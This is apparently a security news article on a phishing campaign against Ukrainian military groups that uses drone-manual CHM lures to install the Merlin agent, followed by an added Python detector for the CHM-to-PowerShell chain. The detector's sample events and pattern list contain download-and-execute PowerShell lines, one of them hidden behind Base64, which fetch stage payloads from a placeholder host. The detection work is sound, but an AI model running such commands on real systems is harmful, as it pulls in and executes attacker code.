Ukrainian military groups have been targeted by a phishing campaign that uses drone manuals as bait to distribute Merlin, a Go-based open-source post-exploitation toolset.
“Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAV service manuals have begun to surface,” Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov reported to The Hacker News.
The cybersecurity firm is tracking the campaign under the name STARK#VORTEX.
The attack begins with a Microsoft Compiled HTML Help (CHM) file. When the victim opens it, malicious JavaScript embedded in one of the bundled HTML pages runs PowerShell code that contacts a remote server and downloads an obfuscated binary.
That payload is decoded to extract the Merlin Agent, which is configured to communicate with a command-and-control (C2) server for post-exploitation actions, giving the attackers control of the host.
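The chain above (CHM opened by the Windows HTML Help viewer, JavaScript launching PowerShell, PowerShell fetching a payload) leaves a distinctive parent/child process trail. The following is an added example, not code from Securonix, CERT-UA or the Merlin project: a small detector run over constructed Sysmon-style process-creation events that flags hh.exe spawning a script interpreter and decodes any `-EncodedCommand` argument so download-and-execute cmdlets hidden behind Base64 can be inspected. The event field names, the sample command lines and the placeholder URL are assumptions made for the demonstration.

```python
"""
Added example (not from the Securonix report or The Hacker News article).
Detects the CHM -> JavaScript -> PowerShell -> download chain from
Sysmon-style process-creation events. All sample data below is constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import List

# Cmdlets and aliases commonly used to fetch and run a remote payload.
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Net\.WebClient|DownloadString|DownloadFile|"
    r"Invoke-Expression|\biex\b|Start-BitsTransfer|\bcurl\b)",
    re.IGNORECASE,
)

# hh.exe is the Windows HTML Help viewer that renders CHM files; it has
# no legitimate reason to launch these interpreters.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")


@dataclass
class Event:
    parent_image: str   # Sysmon ParentImage (assumed field name)
    image: str          # Sysmon Image
    command_line: str   # Sysmon CommandLine


@dataclass
class Finding:
    reason: str
    decoded_command: str  # plaintext of -EncodedCommand if one was present, else ""


def decode_encoded_command(command_line: str) -> str:
    """Return the UTF-16LE plaintext behind -e/-ec/-enc/-EncodedCommand, or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  command_line, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze(event: Event) -> List[Finding]:
    """Return the findings for one process-creation event."""
    findings: List[Finding] = []
    parent, child = _basename(event.parent_image), _basename(event.image)
    decoded = decode_encoded_command(event.command_line)
    effective = decoded or event.command_line  # inspect the real command, not the wrapper

    if parent == "hh.exe" and child in SCRIPT_HOSTS:
        findings.append(Finding("HTML Help viewer (hh.exe) spawned a script interpreter", decoded))
    if child in ("powershell.exe", "pwsh.exe") and DOWNLOAD_PATTERNS.search(effective):
        where = " inside -EncodedCommand" if decoded else ""
        findings.append(Finding("PowerShell download/execute cmdlet" + where, decoded))
    return findings


def sample_events() -> List[Event]:
    """Constructed events: one malicious encoded chain, one benign, one plaintext chain."""
    # Build the Base64 the way PowerShell expects it (UTF-16LE), from a constructed command.
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    encoded = base64.b64encode(stage2.encode("utf-16-le")).decode("ascii")
    return [
        Event(r"C:\Windows\hh.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {encoded}"),
        Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -Command Get-Process"),
        Event(r"C:\Windows\hh.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/a -OutFile a.bin"),
    ]


def run_demo() -> List[int]:
    """Number of findings per sample event, in order."""
    return [len(analyze(e)) for e in sample_events()]


if __name__ == "__main__":
    for e in sample_events():
        for f in analyze(e):
            print(f"{_basename(e.parent_image)} -> {_basename(e.image)}: {f.reason}")
            if f.decoded_command:
                print("    decoded:", f.decoded_command)
```

The decode step matters because a rule that only pattern-matches the raw command line never sees the cmdlets once they are wrapped in `-EncodedCommand`; decoding first and matching on the plaintext is what catches the obfuscated variant. On a real endpoint the same logic can be driven from Sysmon Event ID 1 or Windows Security Event ID 4688 with command-line auditing enabled.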
“While the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection,” according to the investigators.
This is not the first time Merlin has been used against Ukrainian government organisations. The Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain in early August 2023 that used CHM files as decoys to infect machines with the same open-source tool.
CERT-UA attributed those intrusions to a threat actor it tracks as UAC-0154.
“Files and documents used in the attack chain are very capable of bypassing defences,” claimed the researchers.
“It would be unusual to receive a Microsoft help file over the internet. The attackers, on the other hand, framed the lure documents to look like something an unsuspecting target may expect to see in a help-themed document or file.”
The news comes only weeks after CERT-UA reported an unsuccessful cyber attack by the Russian state-sponsored group known as APT28 against an undisclosed critical energy infrastructure facility in the country.